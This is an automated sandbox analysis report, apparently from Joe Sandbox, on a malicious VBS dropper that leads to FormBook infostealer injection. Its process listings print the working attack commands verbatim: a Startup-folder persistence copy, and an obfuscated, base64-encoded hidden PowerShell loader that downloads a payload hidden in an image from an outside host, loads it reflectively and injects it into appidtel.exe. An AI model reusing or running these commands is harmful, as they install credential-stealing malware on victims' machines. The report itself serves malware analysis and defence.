                                        2024-10-10 07:29:06 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        2024-10-10 07:29:06 UTC1369INData Raw: 34 79 67 36 35 4f 58 75 37 70 70 46 4a 69 43 67 70 45 55 49 42 76 31 4f 77 6d 67 47 67 4a 4f 46 71 63 6f 76 67 4b 6a 53 68 48 6f 4f 66 2b 30 31 6d 68 6c 55 41 37 73 79 4c 6f 35 30 38 50 77 46 4a 52 30 2b 72 44 57 4e 49 6d 6b 7a 64 39 5a 4b 61 79 4e 4e 42 4b 39 62 4e 65 68 31 4f 6c 68 31 31 2f 57 6e 72 37 7a 4f 71 6e 4f 53 2b 64 78 61 41 6f 79 49 72 43 53 6c 7a 63 32 7a 39 56 79 30 62 44 51 69 63 32 2b 65 51 79 54 42 6c 4f 33 32 31 32 55 6d 74 56 63 55 69 7a 4c 53 78 74 41 4f 35 4a 4c 2b 4d 5a 45 74 44 61 43 5a 44 55 4d 61 51 33 52 59 41 52 65 73 2f 67 31 46 56 33 6c 31 42 67 48 4b 59 2b 31 5a 34 33 7a 34 6f 43 4c 64 45 4b 34 54 75 74 43 71 57 30 66 2b 69 75 51 52 39 46 62 62 49 79 70 54 4f 55 36 54 6f 31 45 6e 5a 5a 71 73 34 66 31 61 66 7a 30 74 30 47 48
                                        Data Ascii: 4yg65OXu7ppFJiCgpEUIBv1OwmgGgJOFqcovgKjShHoOf+01mhlUA7syLo508PwFJR0+rDWNImkzd9ZKayNNBK9bNeh1Olh11/Wnr7zOqnOS+dxaAoyIrCSlzc2z9Vy0bDQic2+eQyTBlO3212UmtVcUizLSxtAO5JL+MZEtDaCZDUMaQ3RYARes/g1FV3l1BgHKY+1Z43z4oCLdEK4TutCqW0f+iuQR9FbbIypTOU6To1EnZZqs4f1afz0t0GH
                                        2024-10-10 07:29:06 UTC1099INData Raw: 79 6d 74 6a 36 50 34 63 39 47 2b 67 37 65 55 79 59 64 41 39 33 79 58 59 4f 4c 6c 74 73 49 46 6c 49 41 6d 33 46 57 49 7a 46 44 79 4b 44 6a 46 5a 68 73 44 6c 32 2b 67 61 72 2b 55 61 4b 56 4d 46 6f 64 47 61 45 7a 68 53 4a 77 4f 65 69 4e 46 69 39 71 48 41 2f 34 64 70 56 67 57 54 42 48 77 65 54 56 43 5a 70 74 68 70 64 49 64 77 30 70 68 61 66 42 6d 6f 59 64 32 4e 34 55 47 4e 67 53 68 78 6f 59 43 74 42 74 2f 79 42 69 75 48 41 67 61 54 72 34 54 75 66 37 77 41 6a 4e 37 6f 48 71 70 39 53 52 53 32 2f 2b 33 59 64 6a 67 35 52 4d 61 49 34 44 71 2f 6a 4b 39 79 7a 42 76 74 70 56 4f 52 74 6f 4d 6d 4f 54 55 36 63 55 64 72 4a 4c 67 6d 2f 61 39 34 41 56 68 41 36 30 6a 51 45 65 4c 63 66 39 50 33 35 69 55 43 78 61 4a 45 44 57 45 57 4e 6d 74 67 6c 77 44 74 37 41 4e 72 6b 66 6b
                                        Data Ascii: ymtj6P4c9G+g7eUyYdA93yXYOLltsIFlIAm3FWIzFDyKDjFZhsDl2+gar+UaKVMFodGaEzhSJwOeiNFi9qHA/4dpVgWTBHweTVCZpthpdIdw0phafBmoYd2N4UGNgShxoYCtBt/yBiuHAgaTr4Tuf7wAjN7oHqp9SRS2/+3Ydjg5RMaI4Dq/jK9yzBvtpVORtoMmOTU6cUdrJLgm/a94AVhA60jQEeLcf9P35iUCxaJEDWEWNmtglwDt7ANrkfk
                                        2024-10-10 07:29:06 UTC1369INData Raw: 34 30 30 30 0d 0a 41 77 51 41 68 52 49 53 74 2b 4f 6e 70 5a 36 65 66 67 55 59 43 66 59 4e 55 32 68 51 37 48 37 67 45 65 7a 6d 32 76 71 37 70 50 65 71 49 7a 39 65 79 4f 47 52 72 64 74 48 38 55 79 52 49 6b 56 4b 61 71 70 6f 59 69 52 47 68 68 78 61 47 52 49 6d 2b 61 5a 45 6e 35 7a 5a 34 61 2b 6b 49 59 31 6a 69 53 64 5a 6b 75 2b 38 68 32 36 6f 78 74 64 2f 6c 57 45 76 2b 58 41 67 6f 38 63 6a 58 62 6f 71 57 35 62 38 2b 36 57 54 53 51 4f 47 6c 55 65 78 71 69 77 45 46 61 49 6f 51 4d 39 36 79 59 68 5a 57 49 59 39 63 6e 55 7a 33 42 6c 6d 65 31 69 6c 61 37 58 4e 4a 45 58 54 6c 6c 7a 48 6c 61 2b 43 4f 77 51 58 73 50 65 6c 4f 7a 55 36 55 61 72 74 46 4b 73 6b 2b 57 42 35 42 6c 37 58 36 6a 4d 46 6e 75 56 56 58 36 37 72 61 39 6f 31 44 48 6c 35 70 2f 39 2b 4a 78 36 4c 73
                                        Data Ascii: 4000AwQAhRISt+OnpZ6efgUYCfYNU2hQ7H7gEezm2vq7pPeqIz9eyOGRrdtH8UyRIkVKaqpoYiRGhhxaGRIm+aZEn5zZ4a+kIY1jiSdZku+8h26oxtd/lWEv+XAgo8cjXboqW5b8+6WTSQOGlUexqiwEFaIoQM96yYhZWIY9cnUz3Blme1ila7XNJEXTllzHla+COwQXsPelOzU6UartFKsk+WB5Bl7X6jMFnuVVX67ra9o1DHl5p/9+Jx6Ls
                                        2024-10-10 07:29:06 UTC1369INData Raw: 64 69 53 6e 43 30 47 4f 6a 4c 2b 48 31 4a 52 43 38 37 76 43 57 43 4c 7a 54 59 64 79 42 31 47 67 42 68 57 76 38 71 4d 76 7a 76 66 77 62 69 4f 38 61 47 4c 4d 68 4d 6d 4e 72 65 78 70 57 32 48 65 51 42 79 57 5a 67 55 2f 62 65 57 50 4c 78 67 78 53 70 4d 4c 68 70 30 44 2f 51 57 64 54 34 33 43 70 67 58 72 65 6e 51 63 33 4c 79 6a 54 6e 69 72 66 48 69 38 41 34 50 52 64 74 31 72 52 62 6b 54 7a 64 5a 68 38 4b 4a 59 37 66 65 55 51 46 6a 4a 72 2f 61 4d 51 77 75 4a 33 74 76 4d 34 5a 6d 72 37 36 39 46 43 43 38 39 75 61 4b 43 75 72 47 4e 67 76 68 49 62 70 36 6a 66 6e 70 31 38 72 62 52 5a 73 33 56 76 51 39 54 6c 59 78 54 46 74 69 76 48 62 55 4b 5a 59 64 68 76 38 32 61 39 47 4e 59 75 49 44 68 4b 75 4e 58 71 72 67 73 2f 54 37 64 65 6a 61 4c 6b 31 77 67 7a 37 7a 4a 71 6f 42
                                        Data Ascii: diSnC0GOjL+H1JRC87vCWCLzTYdyB1GgBhWv8qMvzvfwbiO8aGLMhMmNrexpW2HeQByWZgU/beWPLxgxSpMLhp0D/QWdT43CpgXrenQc3LyjTnirfHi8A4PRdt1rRbkTzdZh8KJY7feUQFjJr/aMQwuJ3tvM4Zmr769FCC89uaKCurGNgvhIbp6jfnp18rbRZs3VvQ9TlYxTFtivHbUKZYdhv82a9GNYuIDhKuNXqrgs/T7dejaLk1wgz7zJqoB
                                        2024-10-10 07:29:06 UTC1369INData Raw: 54 33 51 61 4e 71 76 2b 6d 48 74 6e 78 59 62 46 57 61 41 4b 6a 44 49 51 72 57 67 64 77 4d 73 5a 43 67 50 35 54 6e 58 62 6c 55 6f 51 65 42 49 66 46 54 64 56 44 61 4f 63 67 43 64 65 79 42 42 78 32 4a 54 6c 72 34 50 4f 4b 42 55 4f 73 76 44 78 59 63 4f 6c 47 69 31 71 47 76 31 35 32 35 45 64 57 66 67 52 41 63 2f 2b 77 6f 78 67 70 54 4b 44 42 64 42 7a 76 37 67 36 37 62 58 61 76 6d 5a 30 76 31 76 4c 48 43 42 79 55 6f 47 35 4b 7a 56 43 34 55 34 42 47 2f 2f 65 6a 6c 51 4a 52 43 63 61 68 32 5a 78 76 35 46 56 76 73 75 71 35 4a 74 2f 61 34 4f 56 37 4a 79 77 4f 74 4c 54 45 38 4a 63 34 41 65 55 49 4d 6b 54 2b 4a 73 6b 61 66 32 6c 41 77 72 72 6e 72 6a 41 73 51 36 36 67 4c 74 79 47 6d 6f 5a 70 47 65 68 44 7a 6d 65 71 2f 6f 32 4f 53 6e 6a 2f 78 37 30 4b 35 71 2f 72 5a 41
                                        Data Ascii: T3QaNqv+mHtnxYbFWaAKjDIQrWgdwMsZCgP5TnXblUoQeBIfFTdVDaOcgCdeyBBx2JTlr4POKBUOsvDxYcOlGi1qGv1525EdWfgRAc/+woxgpTKDBdBzv7g67bXavmZ0v1vLHCByUoG5KzVC4U4BG//ejlQJRCcah2Zxv5FVvsuq5Jt/a4OV7JywOtLTE8Jc4AeUIMkT+Jskaf2lAwrrnrjAsQ66gLtyGmoZpGehDzmeq/o2OSnj/x70K5q/rZA
                                        2024-10-10 07:29:06 UTC1369INData Raw: 58 57 6e 31 69 4b 6d 37 4c 74 35 64 6c 59 4f 74 66 46 37 69 45 34 75 64 4c 36 6f 70 61 30 38 54 37 57 49 45 55 4b 6c 65 6b 78 50 69 4e 6b 33 4a 42 41 53 33 64 4f 5a 39 74 62 57 4c 30 6d 37 39 6a 51 68 78 36 75 46 67 57 69 30 68 31 56 50 64 4c 43 6c 6e 52 64 47 4e 70 39 6b 73 38 6f 67 43 39 39 5a 56 78 63 37 38 72 42 4f 50 31 44 66 65 79 2b 33 38 31 5a 54 79 4e 6e 59 63 79 2f 6b 41 34 73 53 4c 42 52 6c 56 41 38 39 7a 36 57 65 68 66 4b 31 43 61 55 30 45 47 55 4c 39 6b 2f 48 50 31 55 69 30 53 59 7a 44 31 6f 46 70 4c 47 4e 67 48 57 34 56 50 78 6c 4e 42 77 63 6b 46 42 61 53 65 7a 77 50 51 33 2f 69 53 45 7a 35 47 66 7a 58 74 70 43 68 79 33 72 76 67 45 45 6d 6e 4b 71 42 73 51 45 39 31 59 6d 76 59 54 71 32 4e 71 76 74 6b 4d 49 6b 65 34 68 4f 46 73 6e 6b 68 39 36
                                        Data Ascii: XWn1iKm7Lt5dlYOtfF7iE4udL6opa08T7WIEUKlekxPiNk3JBAS3dOZ9tbWL0m79jQhx6uFgWi0h1VPdLClnRdGNp9ks8ogC99ZVxc78rBOP1Dfey+381ZTyNnYcy/kA4sSLBRlVA89z6WehfK1CaU0EGUL9k/HP1Ui0SYzD1oFpLGNgHW4VPxlNBwckFBaSezwPQ3/iSEz5GfzXtpChy3rvgEEmnKqBsQE91YmvYTq2NqvtkMIke4hOFsnkh96
                                        2024-10-10 07:29:06 UTC1369INData Raw: 6a 46 58 31 47 58 46 78 4a 64 48 46 7a 78 62 42 2f 61 36 55 7a 53 32 6b 32 69 69 39 62 63 37 48 4c 2b 32 4a 4d 49 41 67 31 49 39 6b 36 41 4f 61 38 79 6d 4f 54 4e 36 7a 63 4c 61 4e 51 4a 48 52 45 33 64 67 71 35 30 6e 47 33 35 35 61 67 32 6b 48 4a 39 31 73 49 77 7a 50 4c 4a 56 2b 68 79 4d 74 4b 36 6f 30 52 63 44 72 37 39 45 41 30 55 56 47 68 30 46 33 4e 7a 48 74 49 6e 41 30 2f 2b 4b 41 30 2b 36 4c 35 68 4e 6c 75 76 32 62 38 64 39 46 4c 6f 45 33 4f 32 63 43 66 2f 36 45 66 44 4b 6b 79 31 38 70 34 58 63 46 4e 58 57 71 76 41 2b 31 4a 48 6e 2b 78 78 69 71 69 42 43 38 30 62 48 50 2b 62 4f 49 68 4d 57 54 52 55 4a 43 58 42 4f 74 58 56 79 41 6a 54 35 4b 5a 32 7a 71 79 45 31 61 48 76 53 62 70 32 73 6f 39 63 68 77 46 76 6e 49 70 73 6d 66 64 62 35 58 54 76 66 4a 4e 32
                                        Data Ascii: jFX1GXFxJdHFzxbB/a6UzS2k2ii9bc7HL+2JMIAg1I9k6AOa8ymOTN6zcLaNQJHRE3dgq50nG355ag2kHJ91sIwzPLJV+hyMtK6o0RcDr79EA0UVGh0F3NzHtInA0/+KA0+6L5hNluv2b8d9FLoE3O2cCf/6EfDKky18p4XcFNXWqvA+1JHn+xxiqiBC80bHP+bOIhMWTRUJCXBOtXVyAjT5KZ2zqyE1aHvSbp2so9chwFvnIpsmfdb5XTvfJN2
                                        2024-10-10 07:29:06 UTC1369INData Raw: 4e 6c 42 5a 4d 66 31 31 49 33 41 43 48 33 61 57 62 62 33 2f 35 75 63 41 4e 47 61 76 50 61 73 35 78 41 73 71 55 63 34 62 49 50 6e 4d 4d 66 48 31 6b 4d 4b 34 50 36 76 45 75 56 76 64 4c 41 63 49 70 39 39 6f 49 7a 44 4b 32 38 70 4d 6d 37 35 63 42 6a 2b 39 4c 2b 48 70 75 6f 59 4d 70 61 36 50 32 79 72 43 45 59 43 72 69 5a 32 51 2b 46 61 6c 76 2b 79 47 42 49 4f 42 53 36 76 61 67 70 64 58 76 62 4a 75 45 34 33 61 4b 6e 68 6e 6b 74 41 64 68 71 7a 4e 56 68 59 37 48 4c 6f 6e 59 51 62 79 54 46 32 6e 6c 61 61 76 65 43 59 2b 53 50 4c 7a 45 5a 30 47 63 62 5a 35 56 6a 6f 6b 78 4c 65 47 76 79 73 32 37 64 56 46 6e 72 4a 62 55 30 63 79 52 76 50 2b 2b 52 32 69 31 49 6a 68 76 52 46 53 4e 7a 76 55 38 2b 57 51 6e 43 55 4b 68 37 4f 73 6b 7a 2b 4b 6a 55 6f 4b 65 2b 2b 51 77 64 41
                                        Data Ascii: NlBZMf11I3ACH3aWbb3/5ucANGavPas5xAsqUc4bIPnMMfH1kMK4P6vEuVvdLAcIp99oIzDK28pMm75cBj+9L+HpuoYMpa6P2yrCEYCriZ2Q+Falv+yGBIOBS6vagpdXvbJuE43aKnhnktAdhqzNVhY7HLonYQbyTF2nlaaveCY+SPLzEZ0GcbZ5VjokxLeGvys27dVFnrJbU0cyRvP++R2i1IjhvRFSNzvU8+WQnCUKh7Oskz+KjUoKe++QwdA


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:03:28:44
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs"
                                        Imagebase:0x7ff6f95f0000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:03:28:45
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
                                        Imagebase:0x7ff636300000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:28:45
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:28:45
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\PING.EXE
                                        Wow64 process (32bit):false
                                        Commandline:ping 127.0.0.1 -n 10
                                        Imagebase:0x7ff7d0070000
                                        File size:22'528 bytes
                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:28:54
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:03:28:57
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:03:28:57
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:03:28:57
                                        Start date:10/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:03:29:05
                                        Start date:10/10/2024
                                        Path:C:\Windows\SysWOW64\appidtel.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\SysWOW64\appidtel.exe"
                                        Imagebase:0x250000
                                        File size:20'992 bytes
                                        MD5 hash:2C04FB942B2735073D75063E9FFBF50C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:11
                                        Start time:03:29:05
                                        Start date:10/10/2024
                                        Path:C:\Windows\SysWOW64\appidtel.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\appidtel.exe"
                                        Imagebase:0x250000
                                        File size:20'992 bytes
                                        MD5 hash:2C04FB942B2735073D75063E9FFBF50C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Reset < >
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1520738992.00007FFB4A0B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ffb4a0b0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48c81ba7566e2cf61bb8ff82a2d2393eec6e5f0bfbbf6f40fccb92951d1e6a35
                                          • Instruction ID: b492ae62a4b17702fb1d9db9a0997bcc84e689907e58a9adf81d1ec7617e0904
                                          • Opcode Fuzzy Hash: 48c81ba7566e2cf61bb8ff82a2d2393eec6e5f0bfbbf6f40fccb92951d1e6a35
                                          • Instruction Fuzzy Hash: 14C135A291EA8B4FE7A5FFB8CA551B5BB96EF19310B1401FED44DCB2D3D9189804C341
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1520570381.00007FFB49FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ffb49fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction ID: cbea3d44751ec49eefaeb4558c0cd6c67566f5b25df91d0b3d251d5ec29116d5
                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction Fuzzy Hash: A001677111CB0D4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1799455742.00007FFB49FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffb49fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45424b1b5f9fc4277b31b03f7ae230e6bc0c748a54749fdd4af8da2fb3905fab
                                          • Instruction ID: d8e7f3ea4f1350956be4fcfec94d491ca8e4aa0ad254c04239afefd528e8f220
                                          • Opcode Fuzzy Hash: 45424b1b5f9fc4277b31b03f7ae230e6bc0c748a54749fdd4af8da2fb3905fab
                                          • Instruction Fuzzy Hash: 4801677111CB0D4FDB44EF0CE451AA6B7E0FB99364F10056DE59AC36A1DA36E882CB46
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75b49260b9e06fbbc6917deb98fd70462f571ead18dd65a1ee028b9d2e094331
                                          • Instruction ID: e61a6298f7b4b31ed54dc6681aa3e71fbd3955eef0209a0105e1971c42becbe1
                                          • Opcode Fuzzy Hash: 75b49260b9e06fbbc6917deb98fd70462f571ead18dd65a1ee028b9d2e094331
                                          • Instruction Fuzzy Hash: DE917FA6A0DB8A4FE7AAAF38D8451B57BD5EF96210B1801FED44DC7283DD149C068382
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
